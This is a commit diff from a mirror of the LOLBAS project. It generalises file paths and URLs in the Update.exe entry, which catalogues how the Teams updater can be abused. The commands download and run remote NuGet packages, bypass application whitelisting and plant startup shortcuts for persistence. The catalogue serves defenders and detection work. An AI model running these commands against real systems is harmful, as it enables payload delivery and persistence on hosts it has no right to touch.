public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 12:42:19 +02:00
Code Issues Projects Releases Wiki Activity

Generalising file paths and urls, see #10 (#422)

Browse Source
This commit is contained in:
Wietze
2025-01-28 11:15:01 +00:00
committed by GitHub
parent e62749f81a
commit a79893e7ad
196 changed files with 555 additions and 758 deletions
Download Patch File Download Diff File Expand all files Collapse all files

30
yml/OtherMSBinaries/Update.yml
View File

@@ -1,17 +1,17 @@
---
Name: Update.exe
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2019-06-26
Commands:
- Command: Update.exe --download [url to package]
- Command: Update.exe --download {REMOTEURL}
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
Usecase: Download binary
Category: Download
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --update=[url to package]
- Command: Update.exe --update={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -21,7 +21,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=[url to package]
- Command: Update.exe --update={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute
@@ -31,7 +31,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=\\remoteserver\payloadFolder
- Command: Update.exe --update={PATH_SMB:folder}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -41,7 +41,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=\\remoteserver\payloadFolder
- Command: Update.exe --update={PATH_SMB:folder}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: Execute
@@ -51,7 +51,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=[url to package]
- Command: Update.exe --updateRollback={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -61,7 +61,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=[url to package]
- Command: Update.exe --updateRollback={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute
@@ -71,7 +71,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
- Command: Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Application Whitelisting Bypass
Category: AWL Bypass
@@ -81,7 +81,7 @@ Commands:
Tags:
- Execute: CMD
- Execute: Remote
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
- Command: Update.exe --updateRollback={PATH_SMB:folder}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -91,7 +91,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
- Command: Update.exe --updateRollback={PATH_SMB:folder}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: Execute
@@ -101,7 +101,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
- Command: Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Execute binary
Category: Execute
@@ -110,8 +110,8 @@ Commands:
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: CMD
- Command: Update.exe --createShortcut=payload.exe -l=Startup
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
- Command: Update.exe --createShortcut={PATH:.exe} -l=Startup
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a shortcut to the specified executable in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Usecase: Execute binary
Category: Execute
Privileges: User
@@ -119,7 +119,7 @@ Commands:
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: EXE
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
- Command: Update.exe --removeShortcut={PATH:.exe}-l=Startup
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
Usecase: Execute binary
Category: Execute